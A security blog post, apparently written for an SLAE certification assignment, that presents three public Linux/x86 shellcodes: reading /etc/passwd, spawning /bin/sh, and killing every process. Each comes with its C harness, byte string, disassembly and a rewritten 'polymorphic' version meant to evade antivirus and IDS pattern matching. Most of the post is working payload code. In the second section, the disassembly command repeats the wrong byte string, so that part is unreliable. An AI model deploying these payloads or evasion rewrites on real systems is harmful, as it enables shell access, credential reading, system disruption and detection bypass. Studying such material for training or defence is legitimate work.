<!DOCTYPE html>
<html lang="en">

<head><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link href="https://fonts.googleapis.com/css?family=Merriweather:300|Raleway:400,700" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/style.css">
<title>POLYMORPHIC_SHELLCODE_EXAMPLE – LINUX/X86</title>
<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>POLYMORPHIC_SHELLCODE_EXAMPLE – LINUX/X86 | IAMROOT</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="POLYMORPHIC_SHELLCODE_EXAMPLE – LINUX/X86" />
<meta name="author" content="Kartik Durg" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification Student ID: SLAE-1233 Assignment: 6 Github: Kartik Durg" />
<meta property="og:description" content="This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification Student ID: SLAE-1233 Assignment: 6 Github: Kartik Durg" />
<link rel="canonical" href="http://localhost:4000/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html" />
<meta property="og:url" content="http://localhost:4000/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html" />
<meta property="og:site_name" content="IAMROOT" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-10-06T00:00:00+05:30" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html"},"author":{"@type":"Person","name":"Kartik Durg"},"description":"This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification Student ID: SLAE-1233 Assignment: 6 Github: Kartik Durg","headline":"POLYMORPHIC_SHELLCODE_EXAMPLE – LINUX/X86","dateModified":"2018-10-06T00:00:00+05:30","datePublished":"2018-10-06T00:00:00+05:30","@type":"BlogPosting","url":"http://localhost:4000/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


<head>

</head></head>

<body>
  <main class="container">
    <section class="about">
      <a href="/"><img src="/assets/portfolio.jpg" alt="Kartik Durg"></a>
      <h2 id="title">
        <a href="/">Kartik Durg</a>
      </h2>
      <p class="tagline">Red Team Research @McAfee</p>
      <ul class="social"><a href="https://github.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-github-circled"></i>
          </li>
        </a><a href="https://www.linkedin.com/in/kartikdurg" target="_blank">
          <li>
            <i class="icon-linkedin-squared"></i>
          </li>
        </a><a href="https://twitter.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-twitter-squared"></i>
          </li>
        </a></ul><nav class="navigation">
        <ul>
          
          <li>
            <a href="/index.html">Home</a>
          </li>
          
        </ul>
      </nav><p>&copy;
        2020</p><div>
        <p>Dark Mode
          <i class="icon-moon"></i>
          <label class="switch">
            <input type="checkbox" id="dark-mode-toggle">
            <span class="slider round" onclick="toggleDarkMode()"></span>
          </label>
        </p>
      </div>
      <script type="text/javascript" src="/assets/js/darkmode.js"></script></section>
    <section class="content">
      <div class="post-container">
  <a class="post-link" href="/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html">
    <h2 class="post-title">POLYMORPHIC_SHELLCODE_EXAMPLE – LINUX/X86</h2>
  </a>
  <div class="post-meta">
    <div class="post-date"><i class="icon-calendar"></i>Oct 6, 2018</div></div>
  <div class="post">
    <p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification</p>
<ul>
  <li>Student ID: SLAE-1233</li>
  <li>Assignment: 6</li>
  <li>Github: <a href="https://github.com/kartikdurg">Kartik Durg</a></li>
</ul>

<hr />

<p>The objective of this assignment is to take up 3+ shellcode from Shell-Storm or Exploit-DB and create a polymorphic version of same to beat pattern matching.
Creating a polymorphic version means, modifying the code so that it is not generic but  functionality remains the same. By doing this,detecting a pattern becomes much difficult for AV’s and IDS.</p>

<p>In this post, we will see polymorphic examples of following shellcodes:</p>

<ul>
  <li><a href="http://shell-storm.org/shellcode/files/shellcode-842.php">Linux/x86 – Tiny Read File Shellcode</a></li>
  <li><a href="http://shell-storm.org/shellcode/files/shellcode-841.php">Linux/x86 – Tiny Execve sh Shellcode</a></li>
  <li><a href="http://shell-storm.org/shellcode/files/shellcode-626.php">Linux/x86 – Kill all running process</a></li>
</ul>

<h3 id="1-linuxx86--tiny-read-file-shellcode">1) LINUX/X86 – TINY READ FILE SHELLCODE</h3>

<p>The following shellcode is available on shell-storm which is written by Geyslan G. Bem:</p>

<h4 id="original-code">Original code:</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x93\x91\xb0\x03\x31\xd2\x66\xba\xff\x0f\x42\xcd\x80\x92\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x93\xcd\x80"

main ()
{
   // When contains null bytes, printf will show a wrong shellcode length.
    printf("Shellcode Length:  %d\n", strlen(shellcode));
    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
    __asm__ ("movl $0xffffffff, %eax\n\t"
            "movl %eax, %ebx\n\t"
            "movl %eax, %ecx\n\t"
            "movl %eax, %edx\n\t"
            "movl %eax, %esi\n\t"
            "movl %eax, %edi\n\t"
            "movl %eax, %ebp\n\t"

            // Calling the shellcode
            "call shellcode");
}
</code></pre></div></div>

<p>Using ndisasm to view the assembly code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Command-Line 
==&gt; echo -ne "\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x93\x91\xb0\x03\x31\xd2\x66\xba\xff\x0f\x42\xcd\x80\x92\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x93\xcd\x80" | ndisasm -u -

00000000 31C9             xor ecx,ecx
00000002 F7E1             mul ecx
00000004 B005             mov al,0x5
00000006 51               push ecx
00000007 6873737764       push dword 0x64777373
0000000C 68632F7061       push dword 0x61702f63
00000011 682F2F6574       push dword 0x74652f2f   ;/etc/passwd
00000016 89E3             mov ebx,esp
00000018 CD80             int 0x80
0000001A 93               xchg eax,ebx
0000001B 91               xchg eax,ecx
0000001C B003             mov al,0x3
0000001E 31D2             xor edx,edx
00000020 66BAFF0F         mov dx,0xfff
00000024 42               inc edx
00000025 CD80             int 0x80
00000027 92               xchg eax,edx
00000028 31C0             xor eax,eax
0000002A B004             mov al,0x4
0000002C B301             mov bl,0x1
0000002E CD80             int 0x80
00000030 93               xchg eax,ebx
00000031 CD80             int 0x80
</code></pre></div></div>

<h4 id="modified-code">Modified code:</h4>

<p>Lets modify the original code using MOV instruction and also make sure that it has same functionality:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start

section .text
 _start:
	sub ecx,ecx
	mul ecx
	mov al,0x5
	push ecx
	mov dword [esp-4], 0x64777373
	mov dword [esp-8], 0x61702f63
	mov dword [esp-12], 0x74652f2f  ;/etc/passwd
	sub esp, 12
	mov ebx,esp
	int 0x80
	xchg eax,ebx
	xchg eax,ecx
	mov al,0x3
	cdq
	mov dx,0xfff
	inc edx
	int 0x80
	xchg eax,edx
	xor eax,eax
	mov al,0x4
	mov bl,0x1
	int 0x80
	xchg eax,ebx
	int 0x80
</code></pre></div></div>

<h3 id="2-linuxx86--tiny-execve-sh-shellcode">2) LINUX/X86 – TINY EXECVE SH SHELLCODE</h3>

<p>The following shellcode is available on shell-storm which is written by Geyslan G. Bem:</p>

<h4 id="original-code-1">Original code:</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
main ()
{
        // When contains null bytes, printf will show a wrong shellcode length.
	printf("Shellcode Length:  %d\n", strlen(shellcode));

	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
	__asm__ ("movl $0xffffffff, %eax\n\t"
		 "movl %eax, %ebx\n\t"
		 "movl %eax, %ecx\n\t"
		 "movl %eax, %edx\n\t"
		 "movl %eax, %esi\n\t"
		 "movl %eax, %edi\n\t"
		 "movl %eax, %ebp\n\t"
		 // Calling the shellcode
		 "call shellcode");
}
</code></pre></div></div>

<p>Using ndisasm to view the assembly code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Command-Line 
==&gt; echo -ne "\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x93\x91\xb0\x03\x31\xd2\x66\xba\xff\x0f\x42\xcd\x80\x92\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x93\xcd\x80" | ndisasm -u -

00000000 31C9          xor ecx,ecx
00000002 F7E1          mul ecx
00000004 B00B          mov al,0xb
00000006 51            push ecx
00000007 682F2F7368    push dword 0x68732f2f  ;; hs//
0000000C 682F62696E    push dword 0x6e69622f  ;; nib/
00000011 89E3          mov ebx,esp
00000013 CD80          int 0x80
</code></pre></div></div>

<h4 id="modified-code-1">Modified code:</h4>

<p>Lets make use of MOV instruction and modify the hardcoded bytes from the original shellcode:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start

section .text
_start:
 xor ecx,ecx
 mul ecx
 mov al,0xb
 push ecx

 mov esi, 0x57621e1e
 add esi, 0x11111111           ;; hs//
 mov dword [esp-4], esi        

 mov dword [esp-8], 0x6e69622f ;; nib/
 sub esp, 8

 mov ebx,esp
 int 0x80
</code></pre></div></div>

<h3 id="3-linuxx86--kill-all-running-process">3) LINUX/X86 – KILL ALL RUNNING PROCESS</h3>

<p>The following shellcode is available on shell-storm which is written by gunslinger_:</p>

<p>Original code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;

char *killer=
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x25"                    /* mov    $0x25,%al */
 "\x6a\xff"                    /* push   $0xffffffff */
 "\x5b"                        /* pop    %ebx */
 "\xb1\x09"                    /* mov    $0x9,%cl */
 "\xcd\x80"                    /* int    $0x80 */


int main(void)
{
		fprintf(stdout,"Length: %d\n",strlen(killer));
		((void (*)(void)) killer)();
		return 0;
}
</code></pre></div></div>

<h4 id="using-ndisasm-to-view-the-assembly-code">Using ndisasm to view the assembly code:</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Command-Line 
==&gt; echo -ne "\x31\xc0\xb0\x25\x6a\xff\x5b\xb1\x09\xcd\x80" | ndisasm -u -

; kill(-1, SIGKILL=9)
00000000 31C0     xor eax,eax
00000002 B025     mov al,0x25
00000004 6AFF     push byte -0x1
00000006 5B       pop ebx
00000007 B109     mov cl,0x9
00000009 CD80     int 0x80
</code></pre></div></div>

<p>As you can see its pretty simple, this code sets EBX to -1, EAX to 0x25 and ECX to 9</p>

<h4 id="modified-code-2">Modified code:</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start

section .text
_start:
     ; kill(-1, SIGKILL=9)
     xor ebx,ebx
     dec ebx
     push byte 0x25
     pop eax
     push byte 9 
     pop ecx 
     int 0x80
</code></pre></div></div>

<hr />

<p><a href="https://github.com/kartikdurg/SLAE/tree/master/Assignment_0x6">https://github.com/kartikdurg/SLAE/tree/master/Assignment_0x6</a></p>

<p>Thank you for reading 🙂</p>

<p>– Kartik Durg</p>

  </div><div id="disqus_thread" style="margin-top:25px"></div>
  <script>
    var disqus_config = function () {
      this.page.url = 'http://localhost:4000/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html';
      this.page.identifier = 'http://localhost:4000/2018/10/06/0x6-polymorphic-shellcode-example-linux-x86.html';
    };
    (function () {
      var d = document, s = d.createElement('script');
      s.src = 'https://redteam.disqus.com/embed.js';
      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments
      powered by Disqus.</a></noscript></div>

    </section>
  </main><script async src="https://www.googletagmanager.com/gtag/js?id=UA-176694116-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    gtag('config', 'UA-176694116-1');
  </script>
  <script src="/assets/js/simple-jekyll-search.min.js"></script>
  <script src="/assets/js/search.js"></script>
  
</body>

</html>
